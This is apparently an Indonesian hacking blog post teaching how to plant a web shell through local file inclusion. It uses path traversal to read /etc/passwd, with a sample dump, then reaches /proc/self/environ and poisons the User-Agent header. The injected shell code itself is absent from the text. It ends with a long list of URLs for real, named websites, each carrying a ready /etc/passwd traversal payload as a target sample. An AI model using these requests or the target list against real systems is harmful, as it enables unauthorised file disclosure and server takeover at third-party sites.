hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas? sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja…
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
2. coba kita ganti “news.php” dengan “../../../”.
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.comPort 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ
lalu pada user-agent isikan dengan kode berikut :
() tanpa tanda buka tutup kurung
atau
() tanpa tanda buka tutup kurung
lalu submit.

jika script diatas tidak terbaca,silakan lihat keterangan di komentar di bawah.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

happy hacking !

source, ilmuwebsite.com

and beberapa sampel lama,

http://www.winnerspizza.com/index.php?page=/etc/passwd
http://oregon-airsoft.com/index.php?page=/etc/passwd
http://www.eyesonmain.ca/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?page=/etc/passwd
http://www.rtscom.com/index.php?page=/etc/passwd
http://www.lavieillefrance.fr/index.php?page=/etc/passwd
http://www.evoca.ch/index.php?page=../etc/passwd
http://estaminetlille.fr/vieille/index.php?page=/etc/passwd
http://www.traildumont.be/index.php?page=/etc/passwd&album=12
http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd
http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.focusfloors.co.za/?page=../../../../etc/passwd
http://www.bushboats.co.za/index.php?page=../../../../etc/passwd
http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null
http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd
http://www.iceclub.biz/index.php?page=../../../../etc/passwd
http://www.daybororuralfire.com.au/index.php?page=/etc/passwd
http://www.spcstamps.com/index.php?page=/etc/passwd&back=null
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null
http://www.mescreations.fr/index.php?page=../../../../etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP
http://www.scoberbernbach.de/index.php?page=/etc/passwd
http://lomejordehuelva.com/index.php?page=/etc/passwd
http://pomestam24.ru/index.php?page=/etc/passwd&option=login
http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd
http://winnerspizza.com/index.php?page=/etc/passwd
http://timslist.com/utechtube/index.php?page=/etc/passwd
http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd
http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd
http://maxponomarenko.ru/index.php?page=/etc/passwd
http://shotgun.cc/index.php?page=/etc/passwd
http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd
http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd
http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.hamann-lege.de/index.php?page=/etc/passwd
http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4
http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd
http://www.wti-juelich.de/index.php?page=/etc/passwd
http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd
http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null
http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd
http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd
http://www.tendokarate.no/index.php?page=/etc/passwd
http://www.mstechnical.pl/de/index.php?page=/etc/passwd
http://www.k-turm.de/index.php?page=/etc/passwd
http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd
http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd
http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.grabowscy.com/index.php?page=/etc/passwd
http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd
http://www.selfclean.de/index.php?page=/etc/passwd
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.cncmodel.pl/eng/index.php?page=/etc/passwd
http://walk-in-the-park.de/index.php?page=/etc/passwd
http://www.k-tower.eu/index.php?page=/etc/passwd
http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null
http://www.ma2da.de/index.php?page=/etc/passwd
http://www.frauentreff-welden.de/index.php?page=/etc/passwd
http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd
http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd
http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd
http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd
http://www.muezeger.de/index.php?page=/etc/passwd
http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.hctjstbk.cz/index.php?page=/etc/passwd
http://violetta-tradgard.se/index.php?page=/etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd